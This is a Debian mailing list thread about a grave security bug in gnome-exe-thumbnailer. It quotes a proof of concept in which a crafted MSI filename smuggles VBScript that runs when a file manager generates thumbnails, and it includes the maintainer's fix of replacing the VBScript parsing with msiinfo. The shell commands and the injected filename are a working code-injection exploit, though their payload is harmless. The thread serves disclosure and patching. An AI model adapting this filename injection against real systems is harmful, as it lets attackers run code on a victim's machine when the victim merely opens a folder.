[pkg-wine-party] Bug#868705: Bug#868705: gnome-exe-thumbnailer: Thumbnail generation for MSI files executes arbitrary VBScript
Nils Dagsson Moskopp
nils at dieweltistgarnichtso.net
Tue Jul 18 01:02:04 UTC 2017
I like that the patch is less code. Deleted code is debugged code!
Btw, are you sure that using mssiinfo does not introduce new bugs?
Cheers,
Nils
James Lu <bitflip3 at gmail.com> writes:
> [ Unknown signature status ]
> Hi Nils,
>
> I wasn't able to reproduce the exploit on my (64-bit) system with either
> Caja and Nautilus (it also required setting up a new wineprefix in
> ~/.wine). The msi thumbnail ended up generating without any version
> information tag at all.
>
> Regardless, I've gone and replaced the VBScript-based parsing entirely
> with msitools' msiinfo in
> https://github.com/gnome-exe-thumbnailer/gnome-exe-thumbnailer/commit/1d8e3102dd8fd23431ae6127d14a236da6b4a4a5;
> hopefully this should fix the issue. I'll tag a new release soon and
> look at pushing the fix to Debian.
>
> (Also CC'ing the other maintainers, who I don't think are on the Debian
> Wine list)
>
> Best,
> James
>
> On 18/07/17 05:01 AM, Nils Dagsson Moskopp wrote:
>> Package: gnome-exe-thumbnailer
>> Version: 0.9.4-2
>> Severity: grave
>> Tags: security
>> Justification: user security hole
>>
>> Dear Maintainer,
>>
>> the following PoC is copied verbatim from my post about the parsing issue:
>> http://news.dieweltistgarnichtso.net/posts/gnome-thumbnailer-msi-fail.html
>>
>> Proof of Concept
>>
>> Install Dependencies
>>
>> On Debian GNU/Linux, install the packages gnome-exe-thumbnailer, nautilus and wixl. The wixl package is only needed to create MSI files that trigger the thumbnailer.
>>
>> If the proof of concept does not work, install winetricks and run winetricks wsh56 to upgrade the Windows Script Host.
>>
>> Create MSI Files
>>
>> Create a file named poc.xml with the following content:
>>
>> <?xml version="1.0" encoding="utf-8"?>
>> <Wix xmlns="http://schemas.microsoft.com/wix/2006/wi">
>> <Product Version="1.0"/>
>> </Wix>
>>
>> Execute the following Bourne Shell code:
>>
>> wixl -o poc.msi poc.xml
>> cp poc.msi "poc.msi\",0):Set fso=CreateObject(\"Scripting.FileSystemObject\"):Set poc=fso.CreateTextFile(\"badtaste.txt\")'.msi"
>>
>> Trigger Execution
>>
>> Start GNOME Files and navigate to the folder with the MSI files. An empty file with the name badtaste.txt should appear.
>>
>> *** End of the template - remove these template lines ***
>>
>>
>> -- System Information:
>> Debian Release: 9.0
>> APT prefers stable
>> APT policy: (500, 'stable')
>> Architecture: i386 (i686)
>>
>> Kernel: Linux 3.16.0-4-686-pae (SMP w/1 CPU core)
>> Locale: LANG=de_DE.UTF-8, LC_CTYPE=de_DE.UTF-8 (charmap=UTF-8)
>> Shell: /bin/sh linked to /bin/dash
>> Init: sysvinit (via /sbin/init)
>>
>> Versions of packages gnome-exe-thumbnailer depends on:
>> ii icoutils 0.31.2-1.1
>> ii imagemagick 8:6.9.7.4+dfsg-11
>> ii imagemagick-6.q16 [imagemagick] 8:6.9.7.4+dfsg-11
>> ii libglib2.0-bin 2.50.3-2
>>
>> Versions of packages gnome-exe-thumbnailer recommends:
>> pn wine <none>
>> pn wine64-tools | wine32-tools | wine64-development-tools | wine32-dev <none>
>>
>> gnome-exe-thumbnailer suggests no packages.
>>
>> -- no debconf information
>>
>> _______________________________________________
>> pkg-wine-party mailing list
>> pkg-wine-party at lists.alioth.debian.org
>> http://lists.alioth.debian.org/cgi-bin/mailman/listinfo/pkg-wine-party
>>
>
--
Nils Dagsson Moskopp // erlehmann
<http://dieweltistgarnichtso.net>
-------------- next part --------------
A non-text attachment was scrubbed...
Name: signature.asc
Type: application/pgp-signature
Size: 194 bytes
Desc: not available
URL: <http://lists.alioth.debian.org/pipermail/pkg-wine-party/attachments/20170718/b783d758/attachment-0001.sig>
More information about the pkg-wine-party
mailing list